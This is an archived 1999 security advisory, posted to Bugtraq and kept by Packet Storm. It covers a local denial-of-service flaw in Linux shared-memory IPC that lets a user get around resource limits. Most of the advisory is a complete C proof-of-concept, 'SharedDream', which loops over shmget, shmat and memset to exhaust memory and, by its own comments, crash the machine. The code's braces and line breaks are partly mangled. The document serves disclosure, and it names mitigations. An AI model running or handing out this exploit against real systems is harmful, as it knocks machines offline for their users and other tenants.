shared_mem_DoS.txt

1999-09-19T00:00:00
ID PACKETSTORM:15665
Type packetstorm
Reporter Packet Storm
Modified 1999-09-19T00:00:00

Description

                                        
                                            `Subject: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
  
  
### ### ### ### ###  
### ### ### ### ###  
###### ###### ###  
### ### ### ### ###  
### ### ### ### ###  
  
  
S E C U R I T Y  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
KKI Security Team Cracow Commercial Internet  
http://www.security.kki.pl http://www.kki.pl  
mailto:security@security.kki.pl mailto:biuro@kki.pl  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
Raport title : Shared Memory DoS - IPC vulnerability (Linux  
abuse as example)  
Problem found by : Robert Pajak (shadow@security.kki.pl),  
probably other ppl found that first - one of them is  
lcamtuf, Solar Designer is probably other...  
Raport created by : Robert Pajak (shadow@security.kki.pl)  
Lukasz Luzar (lluzar@security.kki.pl)  
Raport published : 14 September, 1999  
Raport code : KKIS.14091999.004.b  
Vulnerable programs : system vulnerability...  
Systems affected : Linux, other (?) ...  
Archive : http://www.security.kki.pl/advisories/  
Risk level : high  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
Useing attached program one can DoS machine even when limits are set  
up...  
This is due to fact that shared memory segments can exist without  
beeing bind with processes. To protect you should diable this  
operations, or use Solar Designer's stack patch with limits set,  
etc...  
  
  
Alan Cox has been notified...  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
Local Denial of Services attack - simple bypassing limits...  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
  
  
/* SharedDream - (c) Shadow, KKI Security */  
/* */  
/* I'm not responsible for any damaged done by this proggie... */  
/* It should be used only for education... */  
/* To protect - use brain, Solar's patches, or whatever... */  
/* This problem is because shared memory segments can exist even */  
/* if they are not combined with programs! */  
/* !This program will crash your machine (localy) at kernels 2.x! */  
/* If you are on kernels 2.2.x with limits run it twice :) */  
/* really - even when rescource limits are set! :) */  
/* Probably original idea by lcamtuf */  
/* heck you should told me that you found it */  
/* first ;) */  
/* heh - worm greetings for for Coding Style ;) */  
  
  
#include <stdio.h>  
#include <sys/types.h>  
#include <sys/ipc.h>  
#include <sys/shm.h>  
  
  
  
#define BOLD "\033[00;04m"  
#define BLUE "\033[00;36m"  
#define STAN "\033[00;00m"  
  
  
void main(void)  
{  
char *p;  
int i = 10000000;  
  
  
  
printf("\n\n");  
printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments  
abuser\n");  
printf(BOLD "*)\n" STAN);  
printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD  
"shadow@security.kki.pl" STAN ")\n");  
printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me),  
lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i  
forgot to mention\n" STAN);  
printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to  
be limited\n");  
printf(BOLD "*)" STAN " Starting...");  
fflush(stdout);  
  
  
while (1)  
  
  
if (p = shmat(shmget(0, i, 0777), 0, 0))  
  
  
memset( p,'\0',i); // need to touch  
memory somehow  
printf(".DoW.");  
fflush(stdout);  
}  
else {  
i--;  
}  
}  
exit(0);  
}  
  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright  
statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Copyright (c) 1999 KKI Security Team, Poland  
All rights reserved.  
  
  
All questions please address to mailto:security@security.kki.pl  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~  
`